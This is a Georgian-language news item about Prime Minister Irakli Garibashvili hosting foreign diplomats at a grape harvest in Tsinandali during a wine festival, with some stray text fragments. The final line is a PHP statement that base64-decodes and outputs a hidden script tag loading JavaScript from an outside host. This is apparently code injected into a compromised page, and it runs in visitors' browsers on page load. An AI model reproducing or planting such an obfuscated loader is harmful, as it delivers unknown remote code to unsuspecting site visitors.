celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა, მთავრობის წევრებთან ერთად, ფესტივალის – „ღვინის დღეები საქართველოში“ ფარგლებში, საქართველოში აკრედიტებული დიპლომატიური კორპუსის წარმომადგენლებს რთველში უმასპინძლა.
 
დიპლომატიური კორპუსის წარმომადგენლები წინანდალს ეწვივნენ.
 
ელჩებმა წინანდლის ისტორიულ ვენახში ყურძენი დაკრიფეს და კულინარიულ მასტერკლასში მიიღეს მონაწილეობა.
 
ირაკლი ღარიბაშვილმა უცხოელ დიპლომატებს საქართველოში რთვლის ტრადიცია გააცნო და საქართველოსთვის მევენახეობისა და მეღვინეობის მნიშვნელობაზე ესაუბრა.
 
როგორც ღარიბაშვილმა აღნიშნა, საქართველოს აქვს ღვინის წარმოების 8 000-წლოვანი ისტორია. მანვე იმედი გამოთქვა, რომ კიდევ უფრო მეტი ტურისტი ეწვევა არა მხოლოდ კახეთს, არამედ ყველა იმ რეგიონს, სადაც ღვინო იწარმოება.

„გვაქვს უნიკალური, 8 000-წლოვანი, ღვინის წარმოების ისტორია და ჩემი სურვილი იყო, რომ ყველა ის მეღვინე, იქნებოდა ეს დიდი, თუ საშუალო სიდიდის კომპანია, მცირე მეწარმეები, მარნის მფლობელები, ყველას წარმოედგინა საკუთარი წარმოებული ღვინო და ამას გარდა, ჩვენ ეს უნდა ვაქციოთ სახალხო დღესასწაულად, რომ იტყვიან. ეს უნდა იყოს ყოველწლიური ფესტივალი, ღვინის ფესტივალი და ღვინის დღეები, ისეთი როგორიც არის ევროპაში, ბევრ წარმატებულ ქვეყანაში. ეს არის ჩვენი მთავარი გზავნილი. მჯერა, რომ კიდევ უფრო მეტი ტურისტი ჩამოვა, არა მხოლოდ კახეთში, არამედ ყველა იმ რეგიონში, სადაც ღვინო იწარმოება და ეს უნდა გახდეს ჩვენი საფირმო ნიშანი, რომ იტყვიან. მთავარი გზავნილი არის ის, რომ საქართველო არის ღვინის სამშობლო“, – განაცხადა პრემიერმა.

345
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");